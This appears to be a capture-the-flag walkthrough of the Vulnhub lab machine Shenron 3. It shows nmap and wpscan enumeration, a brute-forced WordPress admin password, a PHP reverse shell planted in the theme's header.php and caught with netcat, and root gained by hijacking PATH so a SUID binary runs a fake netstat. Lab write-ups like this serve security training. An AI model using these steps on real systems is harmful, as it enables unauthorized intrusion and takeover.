Shenron 3 Vulnhub Walkthrough
Initial Enumeration
As usual, I started the initial enumeration by running a port scan using nmap, looking for open ports and running services.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron3]
└─$ nmap -sC -sV -oA nmap/initial 192.168.1.122
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 12:51 IST
Nmap scan report for 192.168.1.122
Host is up (0.035s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 4.6
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: shenron-3 | Just another WordPress site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.15 seconds
We have only port 80 open which is running an Apache httpd web server. I also ran a full port nmap scan in the background and got the same result.
So we do not have any other ports open, so let's start the enumeration by visiting the website in our web browser. This website did not load correctly and was resolving the DNS to http://shenron
. So I added shenron
in my /etc/hosts
file.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron3]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.122 shenron
Now we can visit the website in our web browser.
We can see that this is running WordPress. So next I used wpscan
to enumerate for WordPress users and vulnerable plugins.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron3]
└─$ wpscan --url http://shenron --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://shenron/ [192.168.1.122]
[+] Started: Fri May 28 13:01:39 2021
.
.
.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri May 28 13:01:46 2021
[+] Requests Done: 13
[+] Cached Requests: 46
[+] Data Sent: 3.254 KB
[+] Data Received: 7.142 KB
[+] Memory used: 167.93 MB
[+] Elapsed time: 00:00:07
We have a username admin, so next I tried to brute-force the /wp-login
password using the same tool.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron3]
└─$ wpscan --url http://shenron --usernames admin --passwords /usr/share/wordlists/rockyou.txt
Hurray, we got the password (iloverockyou). Now we can login into the WordPress dashboard by visiting http://shenron/wp-admin
and this will redirect us to the login page. After logging in, we will be redirected to the dashboard.
Now there are multiple ways to get a shell after logging into the WordPress Dashboard. One of my favorites is replacing the code of header.php with the php-reverse-shell.
For this, Navigate to Appearance > Editor and then select Theme Header (header.php) from the menu on the right.
Alternatively, you can also visit the following URL to edit the file:
shenron/wp-admin/theme-editor.php?file=header.php&theme=twentyeleven
Next save the file and start a netcat listener. Now visit http://shenron
in your web browser to trigger the web shell.
┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron3]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.1.67] from (UNKNOWN) [192.168.1.122] 54210
Linux shenron 5.4.0-71-generic #79-Ubuntu SMP Wed Mar 24 10:56:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
11:15:21 up 10:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Next, I upgraded this shell to a fully interactive TTY using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
reset
Ctrl+D
export TERM=xterm-256color
stty rows 42
stty columns 149
Privilege Escalation and Root Shell
We can now use the same password we found for WordPress to login as user shenron
and read our first flag.
www-data@shenron:/$ su shenron
Password:
shenron@shenron:/$ cd
shenron@shenron:~$ ls
local.txt network
shenron@shenron:~$ cat local.txt
a57e2ff676cd040d58b375f686c7cedc
Now inside the home directory, we have a file called network
. I used the ls -la
command to view the permission of the file and found that it is a SUID.
shenron@shenron:~$ ls -la network
-rwsr-xr-x 1 root root 16712 Apr 15 21:58 network
Next I executed the binary and got the following output:
shenron@shenron:~$ ./network
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 441/mysqld
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 303/systemd-resolve
tcp6 0 0 :::80 :::* LISTEN 437/apache2
udp 0 0 127.0.0.53:53 0.0.0.0:* 303/systemd-resolve
udp 0 0 192.168.29.181:68 0.0.0.0:* 239/systemd-network
udp6 0 0 fe80::a00:27ff:fe84:546 :::* 239/systemd-network
This output is similar to the output of netstat
command.
shenron@shenron:~$ netstat -tul
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 localhost:mysql 0.0.0.0:* LISTEN
tcp 0 0 localhost:domain 0.0.0.0:* LISTEN
tcp6 0 0 [::]:http [::]:* LISTEN
udp 0 0 localhost:domain 0.0.0.0:*
udp 0 0 shenron:bootpc 0.0.0.0:*
udp6 0 0 shenron:dhcpv6-client [::]:*
So, we can assume that this binary is calling the netstat
command. We can create our own vulnerable version of netstat
and trick the binary to execute our vulnerable version of netstat
.
For this, first I created a script in /tmp
directory which just executes /bin/bash
and gave it executable permissions.
shenron@shenron:~$ cd /tmp
shenron@shenron:/tmp$ echo /bin/bash > netstat
shenron@shenron:/tmp$ chmod +x netstat
Next, I added /tmp
directory to the starting of $PATH
so that the program executes our version of netstat
.
shenron@shenron:/tmp$ export PATH=/tmp:$PATH
shenron@shenron:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Now after executing the network
binary, we will get our root shell.
shenron@shenron:~$ ./network
root@shenron:~# id
uid=0(root) gid=0(root) groups=0(root),1000(shenron)
Also we can read our flag present in the root directory :)
root@shenron:~# cat /root/root.txt
mmmm # mmmm
#" " # mm mmm m mm m mm mmm m mm " "#
"#mmm #" # #" # #" # #" " #" "# #" # mmm"
"# # # #"""" # # # # # # # """ "#
"mmm#" # # "#mm" # # # "#m#" # # "mmm#"
Your Root Flag Is Here :- a7ed78963dffd9450a34fcc4a0eecb98
Keep Supporting Me. ;-)
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Nicholas Roberts.